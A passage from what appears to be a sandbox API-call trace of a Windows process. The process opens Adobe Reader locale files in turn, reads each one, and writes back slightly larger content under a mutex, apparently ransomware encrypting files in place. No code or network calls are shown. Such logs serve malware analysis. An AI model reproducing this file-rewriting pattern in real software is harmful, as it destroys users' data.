dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x13e00 [0079.413] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.413] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.413] ReleaseMutex (hMutex=0x168) returned 1 [0079.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.NLD", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.NLD", cchWideChar=14, lpMultiByteStr=0x1f7340c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.NLD", lpUsedDefaultChar=0x0) returned 14 [0079.413] ReadFile (in: hFile=0x1e8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.481] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x12e00 [0079.481] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.807] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x12e00 [0079.807] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.808] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0079.808] WriteFile (in: hFile=0x1e8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.809] CloseHandle (hObject=0x1e8) returned 1 [0079.838] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\SendMail.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\sendmail.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0079.840] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.840] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4000 [0079.840] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0079.841] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.841] ReleaseMutex (hMutex=0x168) returned 1 [0079.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.NLD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.NLD", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.NLD", lpUsedDefaultChar=0x0) returned 12 [0079.841] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.851] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3000 [0079.851] ReadFile (in: hFile=0x1e8, lpBuffer=0x26682c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x26682c8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0080.995] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3000 [0080.995] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0080.995] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0080.995] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0080.995] CloseHandle (hObject=0x1e8) returned 1 [0080.996] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\AdobeCollabSync.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\adobecollabsync.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0080.996] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0080.996] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1c00 [0080.996] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0080.996] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0080.997] ReleaseMutex (hMutex=0x168) returned 1 [0080.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.POL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0080.997] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.POL", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.POL", lpUsedDefaultChar=0x0) returned 19 [0080.997] ReadFile (in: hFile=0x1e8, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2e9f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0081.069] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0081.070] WriteFile (in: hFile=0x1e8, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0081.104] CloseHandle (hObject=0x1e8) returned 1 [0081.105] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\IA32.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\ia32.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0081.105] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.105] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe00 [0081.105] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.106] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.106] ReleaseMutex (hMutex=0x168) returned 1 [0081.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.POL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0081.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.POL", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.POL", lpUsedDefaultChar=0x0) returned 8 [0081.106] ReadFile (in: hFile=0x1e8, lpBuffer=0x25ae0d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25ae0d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0081.114] WriteFile (in: hFile=0x1e8, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0081.115] CloseHandle (hObject=0x1e8) returned 1 [0081.115] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\SaveAsRTF.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\saveasrtf.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0081.116] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.116] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4800 [0081.116] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.116] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.116] ReleaseMutex (hMutex=0x168) returned 1 [0081.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.POL", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.POL", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.POL", lpUsedDefaultChar=0x0) returned 13 [0081.116] ReadFile (in: hFile=0x1e8, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.161] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3800 [0081.161] ReadFile (in: hFile=0x1e8, lpBuffer=0x26698c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.364] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3800 [0081.364] WriteFile (in: hFile=0x1e8, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.364] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0081.364] WriteFile (in: hFile=0x1e8, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.364] CloseHandle (hObject=0x1e8) returned 1 [0081.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\accessibility.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\accessibility.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0081.368] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.368] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xac00 [0081.368] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.382] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.382] ReleaseMutex (hMutex=0x168) returned 1 [0081.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.PTB", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.PTB", cchWideChar=17, lpMultiByteStr=0x1f88ba4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.PTB", lpUsedDefaultChar=0x0) returned 17 [0081.383] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.393] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9c00 [0081.393] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.416] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9c00 [0081.417] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.417] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0081.418] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.418] CloseHandle (hObject=0x1e8) returned 1 [0081.422] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\eBook.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\ebook.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0081.423] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.423] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a00 [0081.423] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.423] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.423] ReleaseMutex (hMutex=0x168) returned 1 [0081.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.PTB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0081.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.PTB", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.PTB", lpUsedDefaultChar=0x0) returned 9 [0081.424] ReadFile (in: hFile=0x1e8, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0081.433] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0081.434] WriteFile (in: hFile=0x1e8, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0081.434] CloseHandle (hObject=0x1e8) returned 1 [0081.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\ReadOutLoud.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\readoutloud.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0081.435] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.435] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2c00 [0081.435] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0081.435] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.435] ReleaseMutex (hMutex=0x168) returned 1 [0081.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.PTB", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0081.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.PTB", cchWideChar=15, lpMultiByteStr=0x1f7360c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.PTB", lpUsedDefaultChar=0x0) returned 15 [0081.436] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ea5988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.458] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1c00 [0081.458] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.496] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1c00 [0081.496] WriteFile (in: hFile=0x1e8, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.497] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0081.497] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.498] CloseHandle (hObject=0x1e8) returned 1 [0081.498] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\updater.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\updater.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0083.664] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0083.664] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a00 [0083.664] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0083.664] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.664] ReleaseMutex (hMutex=0x168) returned 1 [0083.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.PTB", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0083.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.PTB", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.PTB", lpUsedDefaultChar=0x0) returned 11 [0083.665] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.667] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0083.667] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, 